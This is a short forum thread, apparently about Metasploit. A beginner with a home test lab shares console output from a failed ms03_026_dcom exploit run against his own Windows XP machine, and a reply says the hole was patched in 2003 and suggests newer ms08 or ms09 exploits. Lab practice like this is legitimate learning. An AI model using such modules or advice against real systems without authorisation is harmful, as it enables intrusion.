    Default nca_s_fault_access_denied

    Good Afternoon,

    I'm running a test lab here at home, my first one. I'm trying to run an exploit (windows/dcerpc/ms03_026_dcom) against my second PC here, an XP sp3 machine. i set all the options, and here is the output I received. I am not an experienced user, so please forgive me any stupidity. I also did a quick google search, the only good result related to BT was in another language, and goolge couldn't translate. Also another forum indicated that the vulnerability may have been patched. Code has been edited for security:

    msf exploit(ms03_026_dcom) > exploit
    [*] Started bind handler
    [-] Exploit failed: The connection timed out (19x.16x.x.xxx:135).
    msf exploit(ms03_026_dcom) > exploit
    [*] Started bind handler[*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal...[*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:19x.16x.x.xxx[135] ...[*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:19x.16x.x.xxx[135] ...[*] Sending exploit ...
    [-] Exploit failed: DCERPC FAULT => nca_s_fault_access_denied

    PS: I am also wondering why my port scan showed all ports filtered, even with the windows firewall off? Maybe my router is providing some security?

    ms03_026_dcom
    It has been patched since late 2003. Try something newer (ms08 or ms09 maybe).
